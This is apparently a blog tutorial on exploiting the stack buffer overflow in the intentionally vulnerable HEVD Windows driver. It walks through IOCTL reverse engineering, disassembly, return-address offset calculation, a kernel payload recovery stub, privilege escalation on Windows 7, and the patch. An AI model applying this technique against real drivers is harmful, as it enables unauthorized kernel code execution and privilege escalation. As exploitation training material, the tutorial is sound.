HackSys Extreme Vulnerable Driver (HEVD) Windows Driver Exploitation - Stack Buffer Overflow
Brief
The vulnerability class that we are going to hunt for and exploit is a Stack Buffer Overflow in the HEVD.sys Windows driver, where the vulnerable function is not protected by a stack cookie/canary (/GS Buffer Security Check, or StackGuard). We are also going to look at productization and stabilization of the exploit later on.
We are only going to consider Intel 64 (the 64-bit version of the x86 ISA) targets in this blog post unless explicitly stated otherwise.
Vulnerability
First off, we should grab the latest version of the HEVD binary that we are going to exploit. I am going to use HEVD v3.00.
Our next step is, of course, to load the vulnerable version of the binary in IDA Pro for static analysis. You could also use IDA Free/Demo/Home or any other disassembler of your choice. The Hex-Rays decompiler is not strictly necessary, although it would certainly be helpful.
We will be utilizing the provided PDB symbol file, which will greatly aid us in RE, and later on we will also take a look at the patch to discuss how the vulnerability was fixed.
A useful IDA Pro plugin for initial automated analysis of Windows drivers is DriverBuddyReloaded by VoidSec. It may provide us with a useful starting point and save some time in the process.
After opening the binary, we land in the GsDriverEntry() routine, which doesn’t look anything like the DriverEntry() routine that we are familiar with. It is actually inserted by the compiler when the code is compiled with the /GS compiler flag and performs some initialization to support the detection of buffer overruns.
We can simply follow the call to a function appropriately named here as DriverEntry_0(). Now, this looks more like it! We can already see the device name string and the MS-DOS device name string, which are initialized into nt!_UNICODE_STRING structures using the nt!RtlInitUnicodeString() routine.
We can use the Hex-Rays decompiler to decompile this function and note three things that are of concern to us:
- Creation of the named device object for the driver using the nt!IoCreateDevice() routine. Notably, it doesn’t use the nt!IoCreateDeviceSecure() routine that lets us implement access control. This potentially implies that any process running on the system, even one with a Low Integrity Level token, can open a handle to this device object.
- Creation of the symbolic link object to the device by using the nt!IoCreateSymbolicLink() routine and supplying the MS-DOS device name for the device object. This is necessary to work with the driver from a user-mode application.
- Setting the pointer to the DispatchDeviceControl dispatch routine in the MajorFunction[] array of the driver object to handle IRP_MJ_DEVICE_CONTROL requests. For more information, refer to the MSDN documentation on the nt!_DRIVER_OBJECT structure and IRP_MJ_DEVICE_CONTROL.
Now that we have found the driver dispatch routine that handles IRPs with the major I/O function code IRP_MJ_DEVICE_CONTROL, we can start looking for the various functionalities implemented by the driver that we can trigger from a user-mode client application by sending the appropriate IOCTL code and I/O parameters using the kernel32!DeviceIoControl() routine.
Scrolling down a bit, we find a call to the IOCTL handler for the stack buffer overflow, thanks to the helpful debug prints baked into the code (yes, this happens sometimes in production builds too!).
But what is the IOCTL code through which we can take this code path?
Well, we just scroll up a bit in the control flow graph and spot some code that checks if ECX == 0x222003 and jumps to the location we highlighted above if the condition is true. Looks like we have found the IOCTL code to trigger a stack buffer overflow!
We can now decode the IOCTL code using the OSR Online IOCTL Decoder.
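The same decoding can be done by hand, since an IOCTL code is just four bit fields packed by the CTL_CODE macro. The following is a minimal sketch in Python; the helper names ctl_code and decode_ioctl are made up for this illustration and are not part of any Windows API.

```python
# Bit layout of a Windows I/O control code, as packed by the CTL_CODE macro:
#   bits 31..16 DeviceType | bits 15..14 Access | bits 13..2 Function | bits 1..0 Method
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS"}


def ctl_code(device_type, function, method, access):
    """Hypothetical helper: Python equivalent of the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Hypothetical helper: split a 32-bit IOCTL code into its four fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
    }


fields = decode_ioctl(0x222003)
print({k: (hex(v) if isinstance(v, int) else v) for k, v in fields.items()})
```

For 0x222003 this yields device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x800, FILE_ANY_ACCESS and METHOD_NEITHER, which should match what the online decoder reports.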
The most notable fact about this is that it uses the METHOD_NEITHER transfer type, which means the I/O manager neither validates the buffers, which reside in the user virtual address space (UVAS), nor copies them to the kernel virtual address space (KVAS). It is up to the driver to implement proper sanity checks to determine if the buffers are safe to access from the driver.
Let’s take a gander at the disassembly and decompilation of the IOCTL handler for the stack buffer overflow using IDA Pro and the Hex-Rays decompiler:
PAGE:0000000140086594 ; =============== S U B R O U T I N E =======================================
PAGE:0000000140086594
PAGE:0000000140086594
PAGE:0000000140086594 ; int __fastcall BufferOverflowStackIoctlHandler(_IRP *Irp, _IO_STACK_LOCATION *IrpSp)
PAGE:0000000140086594 BufferOverflowStackIoctlHandler proc near
PAGE:0000000140086594 ; CODE XREF: IrpDeviceIoCtlHandler+1D6↑p
PAGE:0000000140086594 ; DATA XREF: .pdata:0000000140084144↑o
PAGE:0000000140086594 Irp = rcx
PAGE:0000000140086594 IrpSp = rdx
PAGE:0000000140086594 000 sub rsp, 28h
PAGE:0000000140086598 028 mov Irp, [IrpSp+20h] ; UserBuffer
PAGE:000000014008659C 028 mov eax, 0C0000001h
PAGE:00000001400865A1 028 mov edx, [IrpSp+10h] ; Size
PAGE:00000001400865A4 028 test Irp, Irp
PAGE:00000001400865A7 028 jz short loc_1400865AE
PAGE:00000001400865A9 028 call TriggerBufferOverflowStack
PAGE:00000001400865AE
PAGE:00000001400865AE loc_1400865AE: ; CODE XREF: BufferOverflowStackIoctlHandler+13↑j
PAGE:00000001400865AE 028 add rsp, 28h
PAGE:00000001400865B2 000 retn
PAGE:00000001400865B2 BufferOverflowStackIoctlHandler endp
PAGE:00000001400865B2
PAGE:00000001400865B2 ; ---------------------------------------------------------------------------
The only thing this function does is extract the pointer to the user’s input buffer and its length from the current I/O stack location and call the HEVD!TriggerBufferOverflowStack() routine with the extracted values as arguments. The I/O manager copied both values as-is from the user-mode client application into the nt!_IRP and its accompanying nt!_IO_STACK_LOCATION structure(s) without any form of checking.
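To see where the two offsets in the handler (IrpSp+10h and IrpSp+20h) come from, the leading part of nt!_IO_STACK_LOCATION can be modeled with ctypes. This is a sketch under the assumption of the x64 layout, where the ULONG members of Parameters.DeviceIoControl are pointer-aligned; the Python class names are made up for this illustration and only the fields needed here are modeled.

```python
import ctypes


class DeviceIoControlParams(ctypes.Structure):
    # Parameters.DeviceIoControl on x64. The ULONG members are pointer-aligned
    # in the WDK headers, so each one occupies an 8-byte slot; the explicit
    # padding fields below model that.
    _fields_ = [
        ("OutputBufferLength", ctypes.c_uint32),
        ("_pad0", ctypes.c_uint32),
        ("InputBufferLength", ctypes.c_uint32),
        ("_pad1", ctypes.c_uint32),
        ("IoControlCode", ctypes.c_uint32),
        ("_pad2", ctypes.c_uint32),
        ("Type3InputBuffer", ctypes.c_uint64),  # PVOID, 8 bytes on x64
    ]


class IoStackLocationHead(ctypes.Structure):
    # Only the beginning of nt!_IO_STACK_LOCATION is modeled here.
    _fields_ = [
        ("MajorFunction", ctypes.c_uint8),
        ("MinorFunction", ctypes.c_uint8),
        ("Flags", ctypes.c_uint8),
        ("Control", ctypes.c_uint8),
        ("_pad", ctypes.c_uint32),
        ("DeviceIoControl", DeviceIoControlParams),
    ]


base = IoStackLocationHead.DeviceIoControl.offset
size_offset = base + DeviceIoControlParams.InputBufferLength.offset
buffer_offset = base + DeviceIoControlParams.Type3InputBuffer.offset
print(hex(size_offset), hex(buffer_offset))
```

Under these assumptions, InputBufferLength lands at the offset the handler reads as Size and Type3InputBuffer at the offset it reads as UserBuffer.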
It looks as though the hunt is finally over as we descend upon the function which is so helpfully named TriggerBufferOverflowStack():
PAGE:00000001400865B4 ; =============== S U B R O U T I N E =======================================
PAGE:00000001400865B4
PAGE:00000001400865B4
PAGE:00000001400865B4 ; __int64 __fastcall TriggerBufferOverflowStack(void *UserBuffer, size_t Size)
PAGE:00000001400865B4 TriggerBufferOverflowStack proc near ; CODE XREF: BufferOverflowStackIoctlHandler+15↑p
PAGE:00000001400865B4 ; DATA XREF: .pdata:0000000140084150↑o
PAGE:00000001400865B4
PAGE:00000001400865B4 KernelBuffer = dword ptr -818h
PAGE:00000001400865B4 var_18 = byte ptr -18h
PAGE:00000001400865B4 arg_0 = qword ptr 8
PAGE:00000001400865B4 arg_8 = qword ptr 10h
PAGE:00000001400865B4 arg_10 = qword ptr 18h
PAGE:00000001400865B4
PAGE:00000001400865B4 UserBuffer = rcx
PAGE:00000001400865B4 Size = rdx
PAGE:00000001400865B4 ; __unwind { // __C_specific_handler
PAGE:00000001400865B4 000 mov [rsp+arg_0], rbx
PAGE:00000001400865B9 000 mov [rsp+arg_8], rsi
PAGE:00000001400865BE 000 mov [rsp+arg_10], rdi
PAGE:00000001400865C3 000 push r12
PAGE:00000001400865C5 008 push r14
PAGE:00000001400865C7 010 push r15
PAGE:00000001400865C9 018 sub rsp, 820h
PAGE:00000001400865D0 838 mov rsi, Size
PAGE:00000001400865D3 838 mov rdi, UserBuffer
PAGE:00000001400865D6 838 xor ebx, ebx
PAGE:00000001400865D8 838 mov r12d, 800h
PAGE:00000001400865DE 838 mov r8d, r12d ; Size
PAGE:00000001400865E1 838 xor edx, edx ; Val
PAGE:00000001400865E3 838 lea UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:00000001400865E8 838 call memset
PAGE:00000001400865ED 838 nop
PAGE:00000001400865EE
PAGE:00000001400865EE loc_1400865EE: ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:00000001400865EE ; __try { // __except at $LN6_0 ; Alignment
PAGE:00000001400865EE 838 lea r8d, [rbx+1]
PAGE:00000001400865F2 838 mov edx, r12d ; Length
PAGE:00000001400865F5 838 mov UserBuffer, rdi ; Address
PAGE:00000001400865F8 838 call cs:__imp_ProbeForRead
PAGE:00000001400865FE 838 mov r9, rdi
PAGE:0000000140086601 838 lea r8, aUserbuffer0xP ; "[+] UserBuffer: 0x%p\n"
PAGE:0000000140086608 838 lea r15d, [rbx+3]
PAGE:000000014008660C 838 mov edx, r15d ; Level
PAGE:000000014008660F 838 lea r14d, [rbx+4Dh]
PAGE:0000000140086613 838 mov ecx, r14d ; ComponentId
PAGE:0000000140086616 838 call cs:__imp_DbgPrintEx
PAGE:000000014008661C 838 mov r9, rsi
PAGE:000000014008661F 838 lea r8, aUserbufferSize ; "[+] UserBuffer Size: 0x%X\n"
PAGE:0000000140086626 838 mov edx, r15d ; Level
PAGE:0000000140086629 838 mov ecx, r14d ; ComponentId
PAGE:000000014008662C 838 call cs:__imp_DbgPrintEx
PAGE:0000000140086632 838 lea r9, [rsp+838h+KernelBuffer]
PAGE:0000000140086637 838 lea r8, aKernelbuffer0x ; "[+] KernelBuffer: 0x%p\n"
PAGE:000000014008663E 838 mov edx, r15d ; Level
PAGE:0000000140086641 838 mov ecx, r14d ; ComponentId
PAGE:0000000140086644 838 call cs:__imp_DbgPrintEx
PAGE:000000014008664A 838 mov r9d, r12d
PAGE:000000014008664D 838 lea r8, aKernelbufferSi ; "[+] KernelBuffer Size: 0x%X\n"
PAGE:0000000140086654 838 mov edx, r15d ; Level
PAGE:0000000140086657 838 mov ecx, r14d ; ComponentId
PAGE:000000014008665A 838 call cs:__imp_DbgPrintEx
PAGE:0000000140086660 838 lea r8, aTriggeringBuff_2 ; "[+] Triggering Buffer Overflow in Stack"...
PAGE:0000000140086667 838 mov edx, r15d ; Level
PAGE:000000014008666A 838 mov ecx, r14d ; ComponentId
PAGE:000000014008666D 838 call cs:__imp_DbgPrintEx
PAGE:0000000140086673 838 mov r8, rsi ; MaxCount
PAGE:0000000140086676 838 mov Size, rdi ; Src
PAGE:0000000140086679 838 lea UserBuffer, [rsp+838h+KernelBuffer] ; Dst
PAGE:000000014008667E 838 call memmove
PAGE:0000000140086683 838 jmp short loc_1400866A0
PAGE:0000000140086683 ; } // starts at 1400865EE
PAGE:0000000140086685 ; ---------------------------------------------------------------------------
PAGE:0000000140086685
PAGE:0000000140086685 $LN6_0: ; DATA XREF: .rdata:00000001400025B0↑o
PAGE:0000000140086685 ; __except(1) // owned by 1400865EE
PAGE:0000000140086685 838 mov ebx, eax
PAGE:0000000140086687 838 mov r9d, eax
PAGE:000000014008668A 838 lea r8, aExceptionCode0 ; "[-] Exception Code: 0x%X\n"
PAGE:0000000140086691 838 mov edx, 3 ; Level
PAGE:0000000140086696 838 lea ecx, [Size+4Ah] ; ComponentId
PAGE:0000000140086699 838 call cs:__imp_DbgPrintEx
PAGE:000000014008669F 838 nop
PAGE:00000001400866A0
PAGE:00000001400866A0 loc_1400866A0: ; CODE XREF: TriggerBufferOverflowStack+CF↑j
PAGE:00000001400866A0 838 mov eax, ebx
PAGE:00000001400866A2 838 lea r11, [rsp+838h+var_18]
PAGE:00000001400866AA 838 mov rbx, [r11+20h]
PAGE:00000001400866AE 838 mov rsi, [r11+28h]
PAGE:00000001400866B2 838 mov rdi, [r11+30h]
PAGE:00000001400866B6 838 mov rsp, r11
PAGE:00000001400866B9 018 pop r15
PAGE:00000001400866BB 010 pop r14
PAGE:00000001400866BD 008 pop r12
PAGE:00000001400866BF 000 retn
PAGE:00000001400866BF ; } // starts at 1400865B4
PAGE:00000001400866BF TriggerBufferOverflowStack endp
The issue here (the memmove() call at 000000014008667E) is apparent. On one hand, we have a local variable called Dst (labeled KernelBuffer in the disassembly listing above); it is an array of type CHAR consisting of 0n2048/0x800 elements, occupying 0n2048 * sizeof(CHAR) = 0n2048/0x800 bytes on the stack. On the other hand, we have an unsafe routine, memmove(), taking attacker-controlled input data and size as arguments and copying the data to the buffer on the stack without any form of size validation, thus making it possible to overflow its bounds and corrupt adjacent data on the stack.
This bug appears to be exploitable in practice too because the input data and the input size both appear to be completely attacker-controlled without any constraints.
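The effect of the unchecked copy can be modeled in a few lines of Python. This is only a toy model of the stack region from KernelBuffer up to the return address, based on the prologue in the listing above (three pushes after the locals); the function names and the placeholder register values are made up for this illustration.

```python
import struct

BUFFER_SIZE = 0x800  # size passed to memset() for KernelBuffer


def build_frame(return_address):
    """Model the stack from KernelBuffer up to and including the return address."""
    frame = bytearray(BUFFER_SIZE)                        # KernelBuffer, zeroed
    frame += struct.pack("<3Q", 0x1515, 0x1414, 0x1212)   # placeholder r15, r14, r12
    frame += struct.pack("<Q", return_address)
    return frame


def vulnerable_copy(frame, user_data):
    """Mimic memmove(KernelBuffer, UserBuffer, Size): the length is caller-chosen."""
    if len(user_data) > len(frame):
        raise ValueError("this toy model stops at the return address")
    frame[0:len(user_data)] = user_data


def read_slots(frame):
    """Return the values sitting right after KernelBuffer."""
    r15, r14, r12, ret = struct.unpack_from("<4Q", frame, BUFFER_SIZE)
    return {"r15": r15, "r14": r14, "r12": r12, "retaddr": ret}


# 0x1400865AE is the return site inside BufferOverflowStackIoctlHandler.
frame = build_frame(0x1400865AE)
vulnerable_copy(frame, b"A" * BUFFER_SIZE)            # fits exactly
intact = read_slots(frame)
vulnerable_copy(frame, b"A" * (BUFFER_SIZE + 0x20))   # 0x20 bytes too many
smashed = read_slots(frame)
print(hex(intact["retaddr"]), hex(smashed["retaddr"]))
```

With an input of exactly 0x800 bytes the saved registers and the return address survive; with 0x20 extra bytes all four slots are replaced by the input data.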
Exploitation and Stabilization
Our objective is to exploit this vulnerability to achieve arbitrary code execution in kernel-mode. We previously said that we can corrupt data on the stack using the vulnerability, but how does corrupting random stack data help us in any way, except maybe causing a glorious bugcheck on the device?
Well, as you might know, the call instruction pushes the return address (the address of the instruction following the call) on the stack before changing the (really) extended instruction pointer (EIP/RIP) value to the call target, and the ret instruction pops the value at the top of the stack into EIP/RIP. They are both control flow instructions, as they can be used to control the instruction pointer (a pointer to the next instruction to execute).
So what if we could overwrite a retaddr on the stack with the address of a payload buffer that we control? When the function returns, we are going to have our payload executed instead!
Now that we have defined our exploitation strategy, let’s discuss some potential problems and how we resolve them:
- Legacy and modern exploit mitigations such as KASLR, DEP, GS Cookie, KPP/PatchGuard, SMEP, SMAP, KPTI, kCFG, HyperGuard, HVCI, KCET etc.
  - Some of them are not applicable here, some can be entirely avoided or bypassed and others will completely thwart us. We will discuss them in detail on a case-by-case basis.
- Where do we put our payload?
  - User Virtual Address Space (UVAS).
- What happens if our payload UVA gets paged out before we are done?
  - Lock the payload pages into physical memory, thus ensuring that they cannot be written to the pagefile.
- How do we know how much stack data to corrupt to cause a precise overwrite of the retaddr and not any other arbitrary data on the stack, which may lead to system instability?
  - We must first draw the complete stack layout with the help of the disassembly shown above in order to understand this.
    Note that the offsets here are relative to the stack base containing the retaddr. From this diagram, we can see that after we overflow the bounds of the buffer Dst stored on the stack into the three non-volatile register contents that are also saved on the stack, we can finally overwrite the retaddr (ergo, retaddr offset = 0x800 + 0x8 * 0n3 = 0x818). I’ve seen some writeups use cyclic pattern generators for this purpose, so feel free to confirm the above using Overflow Exploit Pattern Generator - Online Tool by @zerosum0x0. One thing to mention here is that we irreparably trash three saved non-volatile register contents on the stack (R12, R14, and R15) to get to the retaddr, which is not ideal for stability but also unavoidable in our case.
- How do we pick up the original control flow and return back to user-mode after our payload finishes executing, now that we have utterly messed up the stack?
  - There are quite a few approaches to deal with kernel-mode payload recovery or transitioning from ring 0 to ring 3 after successful exploitation. However, it is hard to find a universal method that is equally reliable or optimal for every scenario. Ergo, we will again discuss them in detail on a case-by-case basis.
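The retaddr offset worked out in the list above can be re-derived from the prologue of TriggerBufferOverflowStack() and cross-checked with a cyclic pattern, without touching the target. The sketch below is plain arithmetic plus a Metasploit-style pattern generator written for this illustration; the constant and function names are made up here, and the numeric inputs are read off the disassembly listing.

```python
import string

PUSHED_REGS = 3                     # push r12 / push r14 / push r15
SUB_RSP = 0x820                     # sub rsp, 820h
BUFFER_RSP_OFFSET = 0x838 - 0x818   # lea rcx, [rsp+838h+KernelBuffer], KernelBuffer = -818h

frame_size = SUB_RSP + 8 * PUSHED_REGS            # distance from rsp to the retaddr slot
retaddr_offset = frame_size - BUFFER_RSP_OFFSET   # distance from KernelBuffer to retaddr


def cyclic_pattern(length):
    """Build an Aa0Aa1Aa2... pattern made of unique 3-byte units."""
    units = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                units.append(upper + lower + digit)
                if 3 * len(units) >= length:
                    return "".join(units)[:length].encode()
    raise ValueError("pattern too long to stay unique")


# Simulate the lookup: the 8 bytes that ret would pop are the ones located
# at retaddr_offset inside the pattern, and searching for them gives it back.
pattern = cyclic_pattern(retaddr_offset + 8)
popped = pattern[retaddr_offset:retaddr_offset + 8]
found = pattern.find(popped)
print(hex(frame_size), hex(retaddr_offset), hex(found))
```

In a real debugging session the eight bytes would be read from the faulting return address in the debugger rather than sliced out of the pattern; the lookup step is the same.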
Case I
Intel OS Guard/SMEP not present, KVA Shadow/KPTI disabled
- Target
  - Windows 7 OS, or OS > Windows 7 but running on older Intel hardware (μarch < Ivy Bridge)
  - Intel processor that is not vulnerable to Rogue Data Cache Load/Meltdown/Variant 3/CVE-2017-5754, or without the Meltdown patch (KPTI disabled)
- Proof of Concept
This is the easiest case to deal with as there are no kernel security mitigations to defeat, so we will start with this one (baby steps!).
Kernel-mode Payload Recovery
In order to understand the best approach for our case (and also perhaps the easiest), we need to consult the disassembly of the caller of HEVD!TriggerBufferOverflowStack() and see the location where our callee would have normally returned had the control flow not been hijacked to execute our payload.
Once we identify that, we can append the code stub (highlighted in red) to our payload so that we can execute it ourselves and return to the IRP_MJ_DEVICE_CONTROL IRP handler, which is eventually going to return out of kernel-mode without crashing the system.
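In the BufferOverflowStackIoctlHandler listing above, the instructions at the normal return site (00000001400865AE) are add rsp, 28h followed by retn. As a rough sketch, assuming the stub simply mirrors that epilogue (the actual stub used in the proof of concept may contain more than this), its machine code can be written down and appended to a payload as follows. The helper name with_recovery is made up for this illustration, and a single NOP stands in for the payload body.

```python
# Machine code for the caller's epilogue at 00000001400865AE in the listing above.
ADD_RSP_28 = bytes.fromhex("4883c428")   # add rsp, 28h
RET = bytes.fromhex("c3")                # retn
RECOVERY_STUB = ADD_RSP_28 + RET


def with_recovery(payload_body):
    """Hypothetical helper: end a payload with the handler's own epilogue."""
    return payload_body + RECOVERY_STUB


# A single NOP stands in for the real payload body, which is not shown here.
stub_demo = with_recovery(b"\x90")
print(stub_demo.hex())
```

The reasoning is that when the hijacked ret transfers control to the payload, RSP is exactly where it would have been after a normal return into the handler, so releasing the handler's 0x28-byte frame and returning lands back in the IRP_MJ_DEVICE_CONTROL dispatch routine.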
Demo
Here is a screenshot demonstrating successful exploitation of this vulnerability on a fully updated Windows 7 system with a modified PINKPANTHER payload to achieve Local Privilege Escalation (LPE):
Patch Analysis
So what was the fix? We can load the “secure” version of the binary into IDA Pro to find out.
Quite simple really, as it turns out: by enforcing stringent bounds. As you might notice, the size parameter to memmove() is no longer attacker-controlled; it is fixed to sizeof(KernelBuffer) bytes, which means that we will no longer be able to overrun this buffer on the stack beyond its bounds.
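The effect of the fix can be illustrated with a small Python model in which the copy length no longer depends on the caller. This is a sketch, not the driver code: the function name is made up, the 0xAA bytes stand in for whatever sits next to the buffer on the stack, and the slice only approximates a copy of exactly sizeof(KernelBuffer) bytes.

```python
BUFFER_SIZE = 0x800   # sizeof(KernelBuffer)


def patched_copy(frame, user_data):
    """Mimic memmove(KernelBuffer, UserBuffer, sizeof(KernelBuffer)).

    The real call always copies exactly BUFFER_SIZE bytes; this model simply
    never copies more than that, whatever size the caller claims.
    """
    chunk = user_data[:BUFFER_SIZE]
    frame[0:len(chunk)] = chunk


# 0x20 marker bytes stand in for the saved registers and the return address.
frame = bytearray(BUFFER_SIZE) + b"\xAA" * 0x20
patched_copy(frame, b"A" * (BUFFER_SIZE + 0x20))   # oversized input
adjacent_untouched = frame[BUFFER_SIZE:] == b"\xAA" * 0x20
print(adjacent_untouched)
```

Even with an oversized input, only the first 0x800 bytes are written and the data adjacent to the buffer stays as it was.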
Honourable Mention
Throughout this blog post I have assumed that the readers are already familiar with setting up a Windows test VM with full kernel debugging support and have done so. If that’s not the case, I’d implore you to give this a read: CodeMachine System setup for kernel development and debugging guide
2023-01-11 01:00